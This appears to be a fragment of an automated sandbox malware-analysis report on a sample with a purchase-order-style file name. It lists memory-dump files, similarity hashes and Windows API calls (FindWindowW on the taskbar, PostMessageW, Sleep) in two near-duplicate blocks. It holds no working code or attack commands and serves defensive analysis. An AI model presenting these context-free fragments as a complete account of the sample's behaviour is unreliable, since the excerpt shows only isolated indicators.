                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                      • Opcode ID: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
                                                                                                                                                                                                      • Instruction ID: 13f6a2cf583bc8a725f1f575c1c2257464a34b3c5b58d174a526da678b5d1d8b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04D0C9317863287BF26467719C0BFCA6B589B04B21F100D2AB645AA1D0CAA8A940876D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686A2
                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004686B5
                                                                                                                                                                                                        • Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                                                      • Opcode ID: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
                                                                                                                                                                                                      • Instruction ID: 5327e4fa2a42480748bb7cc66d897ba954c2bddabe160150f35467a3ae9de0ec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7D0C931785328B7E26467719C0BFDA6B589B04B21F100D2AB649AA1D0CAA8A9408768